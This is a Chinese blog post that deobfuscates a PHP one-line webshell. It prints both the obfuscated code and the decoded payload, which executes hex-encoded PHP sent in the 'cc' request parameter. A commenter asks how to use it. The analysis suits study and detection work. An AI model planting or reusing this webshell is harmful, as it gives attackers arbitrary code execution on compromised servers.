一个有趣的一句话木马 0x2 小升级

代码如下:

<?php

$uf="XHIiKSwiIiwkYyk7JGJ1Zj0iIjtmb3IoJGk9MDskaTxzdHJsZW4oJGMpOyRpKz0yKSRidWYuPXVy"; 
$ka="ZXJyb3JfcmVwb3J0aW5nKDApO3NldF90aW1lX2xpbWl0KDApOw0KaWYoQCRfUkVRVUVTVFsnY2Mn"; 
$pjt="XSl7JGM9QCRfUkVRVUVTVFsnY2MnXTsNCiRjPXN0cl9yZXBsYWNlKGFycmF5KCJcbiIsIlx0Iiwi"; 
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="bGRlY29kZSgiJSIuc3Vic3RyKCRjLCRpLDIpKTsNCiRGaUxpPUNyZWF0ZV9GdW5jdGlvbignJywkYnVmKTskRmlMaSgpO30="; 
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp("", $bkf($ka.$pjt.$uf.$iqw)); @$mpy();

?>

其实就是在0x1的基础上加了层简单的扰乱。
首先先不管哪四个字符串变量。看着就像Base64。先看下代码

$vbl = str_replace("ti","","tistittirti_rtietipltiatice");

发现只是个替换函数。继续向下读代码,发现只是通过这种替换加了层扰乱,然后利用$sbp创建了一个函数

$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");

函数的代码被Base64编码了下。然后看下他创建的函数代码。

<?php 
error_reporting(0);set_time_limit(0);
if(@$_REQUEST['cc']){$c=@$_REQUEST['cc'];
$c=str_replace(array("\n","\t","\r"),"",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));
$FiLi=Create_Function('',$buf);$FiLi();}
 ?>

很清晰了。和0x1一个原理。

标签: none

仅有一条评论

  1. 2333 2333

    怎么利用。。

添加新评论